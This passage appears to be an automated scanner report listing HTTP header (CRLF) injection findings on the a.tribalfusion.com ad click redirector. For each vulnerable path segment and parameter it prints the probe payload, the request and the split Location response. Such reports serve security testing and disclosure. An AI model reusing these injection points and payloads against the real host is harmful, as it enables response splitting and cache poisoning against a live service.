Location: http:/ad.doubleclick.net/61e23
6f34d91a354
/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.60. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 79a61%0d%0a591604da318 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/79a61%0d%0a591604da318/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:03 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/79a61
591604da318
/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.61. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload f1fb1%0d%0af39af8ac1d6 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/f1fb1%0d%0af39af8ac1d6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:20 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/f1fb1
f39af8ac1d6

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.62. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 41ee6%0d%0a7a7a7915a85 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6?41ee6%0d%0a7a7a7915a85=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:43 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6?41ee6
7a7a7915a85
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.63. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of the sz request parameter is copied into the Location response header. The payload 8d999%0d%0a5c8d14598ac was submitted in the sz parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=8d999%0d%0a5c8d14598ac HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:50 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=8d999
5c8d14598ac

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.64. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 74b48%0d%0a8df12efedf8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/74b48%0d%0a8df12efedf8/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aInEV8qkaBJDBcN6JQjv1USjRZaHKuixlyvRpCtyVWFIUqZbEO0pm313tUKKUdAYcC5n583s2bMLsIrWlZb3IG8XZcYUdEJGZbZckvxhFAHcZaX0ZaHYNZbc1cjsyZaWylce2R6pe8sItjcn18wS2gZc0o74NAZdEonHTFBADgQ6Za8svjBfqJnbZcZcSDZd4Zb1HjTt5QkaKCBgZc2WOpPZbbZcCnpm5uyIZa3lW4f0cjVTeMmRbCZa4DDuqRCqJZae2DK0tZdx6TGqR1ErwB5GUf10sxCCJnKOQQ6P4tnnWacZdpZa1xT1juTwvy4QLYiUgnGEvlLI2VWw9jPFE2oLusefLFucZbx1UmTZatC1DjdXwDAsAQYKkr7ybxjK9YmTBZbXyc6sNc0rSWBkY6vuQHsv0y4kcp5OZa6lSdOlZcowHSi86LqiMbJ38kpp3s9wZdEIZboX22i6en6rRRiJXBCiP3HFpjCbQMeZd0BIfPkl8QZa7s0SNbrpoNuDrEYmGYrjVpNpWXao8GYUWnwCjrAtVlHsagHdgRdZabuvOlrhxMR8GcZdFr8ZdC4fgxLZd8Ac584UPZdxnkc1Mna2dqhSUyBlwioC; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:33 GMT;
Content-Type: text/html
Location: 74b48
8df12efedf8
/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.65. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 80bfa%0d%0aa4f0fdf3135 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/80bfa%0d%0aa4f0fdf3135/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:34 GMT;
Content-Type: text/html
Location: http:/80bfa
a4f0fdf3135
/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.66. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload fd929%0d%0a0f9f3457d9f was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/fd929%0d%0a0f9f3457d9f/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:00 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/fd929
0f9f3457d9f
/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.67. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload f749e%0d%0aadf104c6dd3 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/f749e%0d%0aadf104c6dd3/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:18 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/f749e
adf104c6dd3
/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.68. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 1dd10%0d%0ab9b49b742a6 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/1dd10%0d%0ab9b49b742a6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:34 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/1dd10
b9b49b742a6

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.69. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [adID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the adID request parameter is copied into the Location response header. The payload 86472%0d%0a3ac15fbfbe3 was submitted in the adID parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=86472%0d%0a3ac15fbfbe3&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:29 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=86472
3ac15fbfbe3
&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.70. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:a:e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the cs:a:e request parameter is copied into the Location response header. The payload 32241%0d%0ab96b6c5512a was submitted in the cs:a:e parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=32241%0d%0ab96b6c5512a HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:19 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=32241
b96b6c5512a

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

